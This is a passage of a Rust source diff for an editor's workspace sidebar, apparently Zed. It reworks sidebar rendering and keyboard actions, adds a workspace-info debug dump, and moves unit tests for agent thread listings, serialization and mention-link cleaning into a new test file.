Pixels { - self.width - } - - fn set_width(&mut self, width: Option, cx: &mut Context) { - self.width = width.unwrap_or(DEFAULT_WIDTH).clamp(MIN_WIDTH, MAX_WIDTH); + } cx.notify(); } - - fn has_notifications(&self, cx: &App) -> bool { - 
!self.picker.read(cx).delegate.notified_workspaces.is_empty() - } } +impl gpui::EventEmitter for Sidebar {} + impl Focusable for Sidebar { - fn focus_handle(&self, cx: &App) -> FocusHandle { - self.picker.read(cx).focus_handle(cx) + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.focus_handle.clone() } } impl Render for Sidebar { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let titlebar_height = ui::utils::platform_title_bar_height(window); - let ui_font = theme::setup_ui_font(window, cx); - let is_focused = self.focus_handle(cx).is_focused(window); + let _titlebar_height = ui::utils::platform_title_bar_height(window); + let ui_font = theme_settings::setup_ui_font(window, cx); + let sticky_header = self.render_sticky_header(window, cx); - let focus_tooltip_label = if is_focused { - "Focus Workspace" - } else { - "Focus Sidebar" - }; + let color = cx.theme().colors(); + let bg = color + .title_bar_background + .blend(color.panel_background.opacity(0.25)); + + let no_open_projects = !self.contents.has_open_projects; + let no_search_results = self.contents.entries.is_empty(); v_flex() .id("workspace-sidebar") - .key_context("WorkspaceSidebar") + .key_context(self.dispatch_context(window, cx)) + .track_focus(&self.focus_handle) + .on_action(cx.listener(Self::select_next)) + .on_action(cx.listener(Self::select_previous)) + .on_action(cx.listener(Self::editor_move_down)) + .on_action(cx.listener(Self::editor_move_up)) + .on_action(cx.listener(Self::select_first)) + .on_action(cx.listener(Self::select_last)) + .on_action(cx.listener(Self::confirm)) + .on_action(cx.listener(Self::expand_selected_entry)) + .on_action(cx.listener(Self::collapse_selected_entry)) + .on_action(cx.listener(Self::toggle_selected_fold)) + .on_action(cx.listener(Self::fold_all)) + .on_action(cx.listener(Self::unfold_all)) + .on_action(cx.listener(Self::cancel)) + .on_action(cx.listener(Self::remove_selected_thread)) + 
.on_action(cx.listener(Self::new_thread_in_group)) + .on_action(cx.listener(Self::toggle_archive)) + .on_action(cx.listener(Self::focus_sidebar_filter)) + .on_action(cx.listener(Self::on_toggle_thread_switcher)) + .on_action(cx.listener(|this, _: &OpenRecent, window, cx| { + this.recent_projects_popover_handle.toggle(window, cx); + })) .font(ui_font) .h_full() .w(self.width) - .bg(cx.theme().colors().surface_background) - .border_r_1() - .border_color(cx.theme().colors().border) - .child( - h_flex() - .flex_none() - .h(titlebar_height) - .w_full() - .mt_px() - .pb_px() - .pr_1() - .when_else( - cfg!(target_os = "macos") && !window.is_fullscreen(), - |this| this.pl(px(TRAFFIC_LIGHT_PADDING)), - |this| this.pl_2(), - ) - .justify_between() - .border_b_1() - .border_color(cx.theme().colors().border) - .child({ - let focus_handle = cx.focus_handle(); - IconButton::new("close-sidebar", IconName::WorkspaceNavOpen) - .icon_size(IconSize::Small) - .tooltip(Tooltip::element(move |_, cx| { + .bg(bg) + .when(self.side(cx) == SidebarSide::Left, |el| el.border_r_1()) + .when(self.side(cx) == SidebarSide::Right, |el| el.border_l_1()) + .border_color(color.border) + .map(|this| match &self.view { + SidebarView::ThreadList => this + .child(self.render_sidebar_header(no_open_projects, window, cx)) + .map(|this| { + if no_open_projects { + this.child(self.render_empty_state(cx)) + } else { + this.child( v_flex() - .gap_1() - .child( - h_flex() - .gap_2() - .justify_between() - .child(Label::new("Close Sidebar")) - .child(KeyBinding::for_action_in( - &ToggleWorkspaceSidebar, - &focus_handle, - cx, - )), - ) + .relative() + .flex_1() + .overflow_hidden() .child( - h_flex() - .pt_1() - .gap_2() - .border_t_1() - .border_color(cx.theme().colors().border_variant) - .justify_between() - .child(Label::new(focus_tooltip_label)) - .child(KeyBinding::for_action_in( - &FocusWorkspaceSidebar, - &focus_handle, - cx, - )), + list( + self.list_state.clone(), + 
cx.processor(Self::render_list_entry), + ) + .flex_1() + .size_full(), ) - .into_any_element() - })) - .on_click(cx.listener(|_this, _, _window, cx| { - cx.emit(SidebarEvent::Close); - })) - }) - .child( - IconButton::new("new-workspace", IconName::Plus) - .icon_size(IconSize::Small) - .tooltip(|_window, cx| { - Tooltip::for_action("New Workspace", &NewWorkspaceInWindow, cx) - }) - .on_click(cx.listener(|this, _, window, cx| { - this.multi_workspace.update(cx, |multi_workspace, cx| { - multi_workspace.create_workspace(window, cx); - }); - })), - ), - ) - .child(self.picker.clone()) + .when(no_search_results, |this| { + this.child(self.render_no_results(cx)) + }) + .when_some(sticky_header, |this, header| this.child(header)) + .vertical_scrollbar_for(&self.list_state, window, cx), + ) + } + }), + SidebarView::Archive(archive_view) => this.child(archive_view.clone()), + }) + .when(self.should_render_acp_import_onboarding(cx), |this| { + this.child(self.render_acp_import_onboarding(cx)) + }) + .child(self.render_sidebar_bottom_bar(cx)) } } -#[cfg(test)] -mod tests { - use super::*; - use feature_flags::FeatureFlagAppExt as _; - use fs::FakeFs; - use gpui::TestAppContext; - use settings::SettingsStore; - - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); - editor::init(cx); - cx.update_flags(false, vec!["agent-v2".into()]); - }); - } - - fn set_thread_info_and_refresh( - sidebar: &Entity, - multi_workspace: &Entity, - index: usize, - title: &str, - status: AgentThreadStatus, - cx: &mut gpui::VisualTestContext, - ) { - sidebar.update_in(cx, |s, _window, _cx| { - s.set_test_thread_info(index, SharedString::from(title.to_string()), status); - }); - multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); - cx.run_until_parked(); - } - - fn has_notifications(sidebar: &Entity, cx: &mut gpui::VisualTestContext) -> bool { - 
sidebar.read_with(cx, |s, cx| s.has_notifications(cx)) - } - - #[gpui::test] - async fn test_notification_on_running_to_completed_transition(cx: &mut TestAppContext) { - init_test(cx); - let fs = FakeFs::new(cx.executor()); - cx.update(|cx| ::set_global(fs.clone(), cx)); - let project = project::Project::test(fs, [], cx).await; - - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); +fn all_thread_infos_for_workspace( + workspace: &Entity, + cx: &App, +) -> impl Iterator { + let Some(agent_panel) = workspace.read(cx).panel::(cx) else { + return None.into_iter().flatten(); + }; + let agent_panel = agent_panel.read(cx); + + let threads = agent_panel + .parent_threads(cx) + .into_iter() + .map(|thread_view| { + let thread_view_ref = thread_view.read(cx); + let thread = thread_view_ref.thread.read(cx); + + let icon = thread_view_ref.agent_icon; + let icon_from_external_svg = thread_view_ref.agent_icon_from_external_svg.clone(); + let title = thread + .title() + .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into()); + let is_native = thread_view_ref.as_native_thread(cx).is_some(); + let is_title_generating = is_native && thread.has_provisional_title(); + let session_id = thread.session_id().clone(); + let is_background = agent_panel.is_background_thread(&session_id); + + let status = if thread.is_waiting_for_confirmation() { + AgentThreadStatus::WaitingForConfirmation + } else if thread.had_error() { + AgentThreadStatus::Error + } else { + match thread.status() { + ThreadStatus::Generating => AgentThreadStatus::Running, + ThreadStatus::Idle => AgentThreadStatus::Completed, + } + }; - let sidebar = multi_workspace.update_in(cx, |_mw, window, cx| { - let mw_handle = cx.entity(); - cx.new(|cx| Sidebar::new(mw_handle, window, cx)) - }); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.register_sidebar(sidebar.clone(), window, cx); - }); - cx.run_until_parked(); + let diff_stats = 
thread.action_log().read(cx).diff_stats(cx); - // Create a second workspace and switch to it so workspace 0 is background. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); - }); - cx.run_until_parked(); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.activate_index(1, window, cx); + ActiveThreadInfo { + session_id, + title, + status, + icon, + icon_from_external_svg, + is_background, + is_title_generating, + diff_stats, + } }); - cx.run_until_parked(); - assert!( - !has_notifications(&sidebar, cx), - "should have no notifications initially" - ); - - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Running, - cx, - ); + Some(threads).into_iter().flatten() +} - assert!( - !has_notifications(&sidebar, cx), - "Running status alone should not create a notification" - ); +pub fn dump_workspace_info( + workspace: &mut Workspace, + _: &DumpWorkspaceInfo, + window: &mut gpui::Window, + cx: &mut gpui::Context, +) { + use std::fmt::Write; + + let mut output = String::new(); + let this_entity = cx.entity(); + + let multi_workspace = workspace.multi_workspace().and_then(|weak| weak.upgrade()); + let workspaces: Vec> = match &multi_workspace { + Some(mw) => mw.read(cx).workspaces().cloned().collect(), + None => vec![this_entity.clone()], + }; + let active_workspace = multi_workspace + .as_ref() + .map(|mw| mw.read(cx).workspace().clone()); - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Completed, - cx, - ); + writeln!(output, "MultiWorkspace: {} workspace(s)", workspaces.len()).ok(); - assert!( - has_notifications(&sidebar, cx), - "Running → Completed transition should create a notification" - ); + if let Some(mw) = &multi_workspace { + let keys: Vec<_> = mw.read(cx).project_group_keys().cloned().collect(); + writeln!(output, "Project group keys ({}):", keys.len()).ok(); + for key in keys { + writeln!(output, " - 
{key:?}").ok(); + } } - #[gpui::test] - async fn test_no_notification_for_active_workspace(cx: &mut TestAppContext) { - init_test(cx); - let fs = FakeFs::new(cx.executor()); - cx.update(|cx| ::set_global(fs.clone(), cx)); - let project = project::Project::test(fs, [], cx).await; + writeln!(output).ok(); + + for (index, ws) in workspaces.iter().enumerate() { + let is_active = active_workspace.as_ref() == Some(ws); + writeln!( + output, + "--- Workspace {index}{} ---", + if is_active { " (active)" } else { "" } + ) + .ok(); + + // The action handler is already inside an update on `this_entity`, + // so we must avoid a nested read/update on that same entity. + if *ws == this_entity { + dump_single_workspace(workspace, &mut output, cx); + } else { + ws.read_with(cx, |ws, cx| { + dump_single_workspace(ws, &mut output, cx); + }); + } + } - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let project = workspace.project().clone(); + cx.spawn_in(window, async move |_this, cx| { + let buffer = project + .update(cx, |project, cx| project.create_buffer(None, false, cx)) + .await?; - let sidebar = multi_workspace.update_in(cx, |_mw, window, cx| { - let mw_handle = cx.entity(); - cx.new(|cx| Sidebar::new(mw_handle, window, cx)) + buffer.update(cx, |buffer, cx| { + buffer.set_text(output, cx); }); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.register_sidebar(sidebar.clone(), window, cx); + + let buffer = cx.new(|cx| { + editor::MultiBuffer::singleton(buffer, cx).with_title("Workspace Info".into()) }); - cx.run_until_parked(); - // Workspace 0 is the active workspace — thread completes while - // the user is already looking at it. 
- set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Running, - cx, - ); - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Completed, - cx, - ); + _this.update_in(cx, |workspace, window, cx| { + workspace.add_item_to_active_pane( + Box::new(cx.new(|cx| { + let mut editor = + editor::Editor::for_multibuffer(buffer, Some(project.clone()), window, cx); + editor.set_read_only(true); + editor.set_should_serialize(false, cx); + editor.set_breadcrumb_header("Workspace Info".into()); + editor + })), + None, + true, + window, + cx, + ); + }) + }) + .detach_and_log_err(cx); +} - assert!( - !has_notifications(&sidebar, cx), - "should not notify for the workspace the user is already looking at" - ); - } +fn dump_single_workspace(workspace: &Workspace, output: &mut String, cx: &gpui::App) { + use std::fmt::Write; - #[gpui::test] - async fn test_notification_cleared_on_workspace_activation(cx: &mut TestAppContext) { - init_test(cx); - let fs = FakeFs::new(cx.executor()); - cx.update(|cx| ::set_global(fs.clone(), cx)); - let project = project::Project::test(fs, [], cx).await; + let workspace_db_id = workspace.database_id(); + match workspace_db_id { + Some(id) => writeln!(output, "Workspace DB ID: {id:?}").ok(), + None => writeln!(output, "Workspace DB ID: (none)").ok(), + }; - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let project = workspace.project().read(cx); - let sidebar = multi_workspace.update_in(cx, |_mw, window, cx| { - let mw_handle = cx.entity(); - cx.new(|cx| Sidebar::new(mw_handle, window, cx)) - }); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.register_sidebar(sidebar.clone(), window, cx); - }); - cx.run_until_parked(); + let repos: Vec<_> = project + .repositories(cx) + .values() + .map(|repo| repo.read(cx).snapshot()) + .collect(); - // Create a second workspace so we can 
switch away and back. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); - }); - cx.run_until_parked(); + writeln!(output, "Worktrees:").ok(); + for worktree in project.worktrees(cx) { + let worktree = worktree.read(cx); + let abs_path = worktree.abs_path(); + let visible = worktree.is_visible(); - // Switch to workspace 1 so workspace 0 becomes a background workspace. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.activate_index(1, window, cx); - }); - cx.run_until_parked(); + let repo_info = repos + .iter() + .find(|snapshot| abs_path.starts_with(&*snapshot.work_directory_abs_path)); - // Thread on workspace 0 transitions Running → Completed while - // the user is looking at workspace 1. - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Running, - cx, - ); - set_thread_info_and_refresh( - &sidebar, - &multi_workspace, - 0, - "Test Thread", - AgentThreadStatus::Completed, - cx, - ); + let is_linked = repo_info.map(|s| s.is_linked_worktree()).unwrap_or(false); + let original_repo_path = repo_info.map(|s| &s.original_repo_abs_path); + let branch = repo_info.and_then(|s| s.branch.as_ref().map(|b| b.ref_name.clone())); - assert!( - has_notifications(&sidebar, cx), - "background workspace completion should create a notification" - ); + write!(output, " - {}", abs_path.display()).ok(); + if !visible { + write!(output, " (hidden)").ok(); + } + if let Some(branch) = &branch { + write!(output, " [branch: {branch}]").ok(); + } + if is_linked { + if let Some(original) = original_repo_path { + write!(output, " [linked worktree -> {}]", original.display()).ok(); + } else { + write!(output, " [linked worktree]").ok(); + } + } + writeln!(output).ok(); + } - // Switching back to workspace 0 should clear the notification. 
- multi_workspace.update_in(cx, |mw, window, cx| { - mw.activate_index(0, window, cx); - }); - cx.run_until_parked(); + if let Some(panel) = workspace.panel::(cx) { + let panel = panel.read(cx); - assert!( - !has_notifications(&sidebar, cx), - "notification should be cleared when workspace becomes active" - ); + let panel_workspace_id = panel.workspace_id(); + if panel_workspace_id != workspace_db_id { + writeln!( + output, + " \u{26a0} workspace ID mismatch! panel has {panel_workspace_id:?}, workspace has {workspace_db_id:?}" + ) + .ok(); + } + + if let Some(thread) = panel.active_agent_thread(cx) { + let thread = thread.read(cx); + let title = thread.title().unwrap_or_else(|| "(untitled)".into()); + let session_id = thread.session_id(); + let status = match thread.status() { + ThreadStatus::Idle => "idle", + ThreadStatus::Generating => "generating", + }; + let entry_count = thread.entries().len(); + write!(output, "Active thread: {title} (session: {session_id})").ok(); + write!(output, " [{status}, {entry_count} entries").ok(); + if thread.is_waiting_for_confirmation() { + write!(output, ", awaiting confirmation").ok(); + } + writeln!(output, "]").ok(); + } else { + writeln!(output, "Active thread: (none)").ok(); + } + + let background_threads = panel.background_threads(); + if !background_threads.is_empty() { + writeln!( + output, + "Background threads ({}): ", + background_threads.len() + ) + .ok(); + for (session_id, conversation_view) in background_threads { + if let Some(thread_view) = conversation_view.read(cx).root_thread(cx) { + let thread = thread_view.read(cx).thread.read(cx); + let title = thread.title().unwrap_or_else(|| "(untitled)".into()); + let status = match thread.status() { + ThreadStatus::Idle => "idle", + ThreadStatus::Generating => "generating", + }; + let entry_count = thread.entries().len(); + write!(output, " - {title} (session: {session_id})").ok(); + write!(output, " [{status}, {entry_count} entries").ok(); + if 
thread.is_waiting_for_confirmation() { + write!(output, ", awaiting confirmation").ok(); + } + writeln!(output, "]").ok(); + } else { + writeln!(output, " - (not connected) (session: {session_id})").ok(); + } + } + } + } else { + writeln!(output, "Agent panel: not loaded").ok(); } + + writeln!(output).ok(); } diff --git a/crates/sidebar/src/sidebar_tests.rs b/crates/sidebar/src/sidebar_tests.rs new file mode 100644 index 0000000000000000000000000000000000000000..60881acfe9461f7897d6013831970444b7a65544 --- /dev/null +++ b/crates/sidebar/src/sidebar_tests.rs @@ -0,0 +1,5718 @@ +use super::*; +use acp_thread::StubAgentConnection; +use agent::ThreadStore; +use agent_ui::{ + test_support::{active_session_id, open_thread_with_connection, send_message}, + thread_metadata_store::ThreadMetadata, +}; +use chrono::DateTime; +use feature_flags::FeatureFlagAppExt as _; +use fs::FakeFs; +use gpui::TestAppContext; +use pretty_assertions::assert_eq; +use project::AgentId; +use settings::SettingsStore; +use std::{ + path::{Path, PathBuf}, + sync::Arc, +}; +use util::path_list::PathList; + +fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + theme_settings::init(theme::LoadThemes::JustBase, cx); + editor::init(cx); + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); +} + +#[track_caller] +fn assert_active_thread(sidebar: &Sidebar, session_id: &acp::SessionId, msg: &str) { + assert!( + sidebar + .active_entry + .as_ref() + .is_some_and(|e| e.is_active_thread(session_id)), + "{msg}: expected active_entry to be Thread({session_id:?}), got {:?}", + sidebar.active_entry, + ); +} + +#[track_caller] +fn assert_active_draft(sidebar: &Sidebar, workspace: &Entity, msg: &str) { + assert!( + matches!(&sidebar.active_entry, Some(ActiveEntry::Draft(ws)) if 
ws == workspace), + "{msg}: expected active_entry to be Draft for workspace {:?}, got {:?}", + workspace.entity_id(), + sidebar.active_entry, + ); +} + +fn has_thread_entry(sidebar: &Sidebar, session_id: &acp::SessionId) -> bool { + sidebar + .contents + .entries + .iter() + .any(|entry| matches!(entry, ListEntry::Thread(t) if &t.metadata.session_id == session_id)) +} + +async fn init_test_project( + worktree_path: &str, + cx: &mut TestAppContext, +) -> Entity { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(worktree_path, serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + project::Project::test(fs, [worktree_path.as_ref()], cx).await +} + +fn setup_sidebar( + multi_workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Entity { + let sidebar = setup_sidebar_closed(multi_workspace, cx); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + cx.run_until_parked(); + sidebar +} + +fn setup_sidebar_closed( + multi_workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Entity { + let multi_workspace = multi_workspace.clone(); + let sidebar = + cx.update(|window, cx| cx.new(|cx| Sidebar::new(multi_workspace.clone(), window, cx))); + multi_workspace.update(cx, |mw, cx| { + mw.register_sidebar(sidebar.clone(), cx); + }); + cx.run_until_parked(); + sidebar +} + +async fn save_n_test_threads( + count: u32, + project: &Entity, + cx: &mut gpui::VisualTestContext, +) { + for i in 0..count { + save_thread_metadata( + acp::SessionId::new(Arc::from(format!("thread-{}", i))), + format!("Thread {}", i + 1).into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, i).unwrap(), + None, + project, + cx, + ) + } + cx.run_until_parked(); +} + +async fn save_test_thread_metadata( + session_id: &acp::SessionId, + project: &Entity, + cx: &mut TestAppContext, +) { + save_thread_metadata( + session_id.clone(), + "Test".into(), + 
chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + project, + cx, + ) +} + +async fn save_named_thread_metadata( + session_id: &str, + title: &str, + project: &Entity, + cx: &mut gpui::VisualTestContext, +) { + save_thread_metadata( + acp::SessionId::new(Arc::from(session_id)), + SharedString::from(title.to_string()), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + project, + cx, + ); + cx.run_until_parked(); +} + +fn save_thread_metadata( + session_id: acp::SessionId, + title: SharedString, + updated_at: DateTime, + created_at: Option>, + project: &Entity, + cx: &mut TestAppContext, +) { + cx.update(|cx| { + let (folder_paths, main_worktree_paths) = { + let project_ref = project.read(cx); + let paths: Vec> = project_ref + .visible_worktrees(cx) + .map(|worktree| worktree.read(cx).abs_path()) + .collect(); + let folder_paths = PathList::new(&paths); + let main_worktree_paths = project_ref.project_group_key(cx).path_list().clone(); + (folder_paths, main_worktree_paths) + }; + let metadata = ThreadMetadata { + session_id, + agent_id: agent::ZED_AGENT_ID.clone(), + title, + updated_at, + created_at, + folder_paths, + main_worktree_paths, + archived: false, + }; + ThreadMetadataStore::global(cx).update(cx, |store, cx| store.save_manually(metadata, cx)); + }); + cx.run_until_parked(); +} + +fn focus_sidebar(sidebar: &Entity, cx: &mut gpui::VisualTestContext) { + sidebar.update_in(cx, |_, window, cx| { + cx.focus_self(window); + }); + cx.run_until_parked(); +} + +fn visible_entries_as_strings( + sidebar: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Vec { + sidebar.read_with(cx, |sidebar, _cx| { + sidebar + .contents + .entries + .iter() + .enumerate() + .map(|(ix, entry)| { + let selected = if sidebar.selection == Some(ix) { + " <== selected" + } else { + "" + }; + match entry { + ListEntry::ProjectHeader { + label, + key, + highlight_positions: _, + .. 
+ } => { + let icon = if sidebar.collapsed_groups.contains(key.path_list()) { + ">" + } else { + "v" + }; + format!("{} [{}]{}", icon, label, selected) + } + ListEntry::Thread(thread) => { + let title = thread.metadata.title.as_ref(); + let active = if thread.is_live { " *" } else { "" }; + let status_str = match thread.status { + AgentThreadStatus::Running => " (running)", + AgentThreadStatus::Error => " (error)", + AgentThreadStatus::WaitingForConfirmation => " (waiting)", + _ => "", + }; + let notified = if sidebar + .contents + .is_thread_notified(&thread.metadata.session_id) + { + " (!)" + } else { + "" + }; + let worktree = if thread.worktrees.is_empty() { + String::new() + } else { + let mut seen = Vec::new(); + let mut chips = Vec::new(); + for wt in &thread.worktrees { + if !seen.contains(&wt.name) { + seen.push(wt.name.clone()); + chips.push(format!("{{{}}}", wt.name)); + } + } + format!(" {}", chips.join(", ")) + }; + format!( + " {}{}{}{}{}{}", + title, worktree, active, status_str, notified, selected + ) + } + ListEntry::ViewMore { + is_fully_expanded, .. + } => { + if *is_fully_expanded { + format!(" - Collapse{}", selected) + } else { + format!(" + View More{}", selected) + } + } + ListEntry::DraftThread { worktrees, .. } => { + let worktree = if worktrees.is_empty() { + String::new() + } else { + let mut seen = Vec::new(); + let mut chips = Vec::new(); + for wt in worktrees { + if !seen.contains(&wt.name) { + seen.push(wt.name.clone()); + chips.push(format!("{{{}}}", wt.name)); + } + } + format!(" {}", chips.join(", ")) + }; + format!(" [~ Draft{}]{}", worktree, selected) + } + ListEntry::NewThread { worktrees, .. 
} => { + let worktree = if worktrees.is_empty() { + String::new() + } else { + let mut seen = Vec::new(); + let mut chips = Vec::new(); + for wt in worktrees { + if !seen.contains(&wt.name) { + seen.push(wt.name.clone()); + chips.push(format!("{{{}}}", wt.name)); + } + } + format!(" {}", chips.join(", ")) + }; + format!(" [+ New Thread{}]{}", worktree, selected) + } + } + }) + .collect() + }) +} + +#[gpui::test] +async fn test_serialization_round_trip(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(3, &project, cx).await; + + let path_list = project.read_with(cx, |project, cx| { + project.project_group_key(cx).path_list().clone() + }); + + // Set a custom width, collapse the group, and expand "View More". + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.set_width(Some(px(420.0)), cx); + sidebar.toggle_collapse(&path_list, window, cx); + sidebar.expanded_groups.insert(path_list.clone(), 2); + }); + cx.run_until_parked(); + + // Capture the serialized state from the first sidebar. + let serialized = sidebar.read_with(cx, |sidebar, cx| sidebar.serialized_state(cx)); + let serialized = serialized.expect("serialized_state should return Some"); + + // Create a fresh sidebar and restore into it. + let sidebar2 = + cx.update(|window, cx| cx.new(|cx| Sidebar::new(multi_workspace.clone(), window, cx))); + cx.run_until_parked(); + + sidebar2.update_in(cx, |sidebar, window, cx| { + sidebar.restore_serialized_state(&serialized, window, cx); + }); + cx.run_until_parked(); + + // Assert all serialized fields match. 
+ let (width1, collapsed1, expanded1) = sidebar.read_with(cx, |s, _| { + ( + s.width, + s.collapsed_groups.clone(), + s.expanded_groups.clone(), + ) + }); + let (width2, collapsed2, expanded2) = sidebar2.read_with(cx, |s, _| { + ( + s.width, + s.collapsed_groups.clone(), + s.expanded_groups.clone(), + ) + }); + + assert_eq!(width1, width2); + assert_eq!(collapsed1, collapsed2); + assert_eq!(expanded1, expanded2); + assert_eq!(width1, px(420.0)); + assert!(collapsed1.contains(&path_list)); + assert_eq!(expanded1.get(&path_list), Some(&2)); +} + +#[gpui::test] +async fn test_restore_serialized_archive_view_does_not_panic(cx: &mut TestAppContext) { + // A regression test to ensure that restoring a serialized archive view does not panic. + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, _panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + cx.update(|_window, cx| { + AgentRegistryStore::init_test_global(cx, vec![]); + }); + + let serialized = serde_json::to_string(&SerializedSidebar { + width: Some(400.0), + collapsed_groups: Vec::new(), + expanded_groups: Vec::new(), + active_view: SerializedSidebarView::Archive, + }) + .expect("serialization should succeed"); + + multi_workspace.update_in(cx, |multi_workspace, window, cx| { + if let Some(sidebar) = multi_workspace.sidebar() { + sidebar.restore_serialized_state(&serialized, window, cx); + } + }); + cx.run_until_parked(); + + // After the deferred `show_archive` runs, the view should be Archive. 
+ sidebar.read_with(cx, |sidebar, _cx| { + assert!( + matches!(sidebar.view, SidebarView::Archive(_)), + "expected sidebar view to be Archive after restore, got ThreadList" + ); + }); +} + +#[test] +fn test_clean_mention_links() { + // Simple mention link + assert_eq!( + Sidebar::clean_mention_links("check [@Button.tsx](file:///path/to/Button.tsx)"), + "check @Button.tsx" + ); + + // Multiple mention links + assert_eq!( + Sidebar::clean_mention_links( + "look at [@foo.rs](file:///foo.rs) and [@bar.rs](file:///bar.rs)" + ), + "look at @foo.rs and @bar.rs" + ); + + // No mention links — passthrough + assert_eq!( + Sidebar::clean_mention_links("plain text with no mentions"), + "plain text with no mentions" + ); + + // Incomplete link syntax — preserved as-is + assert_eq!( + Sidebar::clean_mention_links("broken [@mention without closing"), + "broken [@mention without closing" + ); + + // Regular markdown link (no @) — not touched + assert_eq!( + Sidebar::clean_mention_links("see [docs](https://example.com)"), + "see [docs](https://example.com)" + ); + + // Empty input + assert_eq!(Sidebar::clean_mention_links(""), ""); +} + +#[gpui::test] +async fn test_entities_released_on_window_close(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + let weak_workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().downgrade()); + let weak_sidebar = sidebar.downgrade(); + let weak_multi_workspace = multi_workspace.downgrade(); + + drop(sidebar); + drop(multi_workspace); + cx.update(|window, _cx| window.remove_window()); + cx.run_until_parked(); + + weak_multi_workspace.assert_released(); + weak_sidebar.assert_released(); + weak_workspace.assert_released(); +} + +#[gpui::test] +async fn test_single_workspace_no_threads(cx: &mut TestAppContext) { + let project = 
init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " [+ New Thread]"] + ); +} + +#[gpui::test] +async fn test_single_workspace_with_saved_threads(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-1")), + "Fix crash in project panel".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 3, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-2")), + "Add inline diff view".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in project panel", + " Add inline diff view", + ] + ); +} + +#[gpui::test] +async fn test_workspace_lifecycle(cx: &mut TestAppContext) { + let project = init_test_project("/project-a", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Single workspace with a thread + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-a1")), + "Thread A1".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + 
